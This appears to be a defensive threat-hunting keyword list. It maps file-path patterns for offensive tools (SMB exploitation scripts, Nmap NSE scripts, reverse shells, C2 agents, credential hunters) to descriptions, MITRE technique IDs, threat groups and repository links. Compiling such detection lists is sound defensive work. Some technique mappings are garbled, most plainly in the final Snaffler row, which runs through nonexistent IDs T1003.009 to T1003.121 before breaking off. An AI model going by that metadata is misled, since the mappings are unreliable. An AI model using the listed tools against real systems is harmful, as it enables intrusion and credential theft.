- T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/smb-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-cmds.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/smb-double-pulsar-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/SMBeagle*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*/smb-enum-domains.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-enum-groups.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-enum-processes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-enum-services.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-enum-sessions.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-enum-shares.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smbexec.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/smbexec.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/smb-flood.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/SMBForwarder.txt*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/SMBGhost/scanner.py*,offensive_tool_keyword,SMBGhost,Simple scanner for CVE-2020-0796 - SMBv3 RCE.,T1210 - T1573 - T1553 - T1216 - T1027,TA0006 - TA0011 - TA0008,N/A,N/A,Exploitation tools,https://github.com/ollypwn/SMBGhost,1,1,N/A,N/A,7,647,206,2020-10-01T08:36:29Z,2020-03-11T15:21:27Z -*/SMBGhost_RCE*,offensive_tool_keyword,SMBGhost_RCE_PoC,RCE PoC for CVE-2020-0796 SMBGhost,T1210 - T1059 - T1505 - T1021 - T1027,TA0001 - TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/chompie1337/SMBGhost_RCE_PoC,1,1,N/A,N/A,10,1264,355,2020-07-02T18:51:47Z,2020-06-02T00:14:47Z -*/smbldap.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/smb-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smbmap.git*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,1,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*/smbmapDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/smb-mbenum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-os-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-print-text.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-protocols.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-psexec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-reverse-shell*,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,1,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*/smb-security-mode.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smbserver/smb_server.py*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,1,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*/smb-server-stats.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-signing-disabled-hosts.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/smbspider.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/smbsr.db*,offensive_tool_keyword,SMBSR,Lookup for interesting stuff in SMB shares,T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Reconnaissance,https://github.com/oldboy21/SMBSR,1,1,N/A,N/A,2,138,24,2023-06-16T14:35:30Z,2021-11-10T16:55:52Z -*/SMBSR.git*,offensive_tool_keyword,SMBSR,Lookup for interesting stuff in SMB shares,T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Reconnaissance,https://github.com/oldboy21/SMBSR,1,1,N/A,N/A,2,138,24,2023-06-16T14:35:30Z,2021-11-10T16:55:52Z -*/smbsr.log*,offensive_tool_keyword,SMBSR,Lookup for interesting stuff in SMB shares,T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Reconnaissance,https://github.com/oldboy21/SMBSR,1,1,N/A,N/A,2,138,24,2023-06-16T14:35:30Z,2021-11-10T16:55:52Z -*/smb-system-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-conficker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-cve2009-3103.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-cve-2017-7494.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-cve-2020-0796.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,1,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -*/smb-vuln-ms06-025.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-ms07-029.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-ms08-067.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-ms10-054.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-ms10-061.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-ms17-010.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-regsvc-dos.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-webexec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-webexec-exploit.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/SMShell.git*,offensive_tool_keyword,SMShell,PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers,T1021.001 - T1059.006 - T1071.004 - T1069.003,TA0002 - TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/persistent-security/SMShell,1,1,N/A,10,10,272,20,2023-05-22T10:40:16Z,2023-05-22T08:26:44Z -*/SMShell/*,offensive_tool_keyword,SMShell,PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers,T1021.001 - T1059.006 - T1071.004 - T1069.003,TA0002 - TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/persistent-security/SMShell,1,0,N/A,10,10,272,20,2023-05-22T10:40:16Z,2023-05-22T08:26:44Z -*/smtp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-commands.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-open-relay.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-strangeport.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-user-enum*,offensive_tool_keyword,smtp-user-enum,Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.,T1133 - T1110.001,TA0007 - TA0006,N/A,N/A,Credential Access,https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-vuln-cve2010-4344.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-vuln-cve2011-1720.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-vuln-cve2011-1764.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-vuln-cve2020-28017-through-28026-21nails.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/nccgroup/nmap-nse-vulnerability-scripts,1,1,N/A,N/A,7,620,64,2022-03-04T09:08:55Z,2021-05-18T15:20:30Z -*/smuggler.py*,offensive_tool_keyword,smuggler.py,HTML Smuggling Generator,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py,1,1,N/A,9,3,228,42,2023-06-14T02:13:19Z,2023-01-15T22:37:34Z -*/SnaffCon.cs*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - 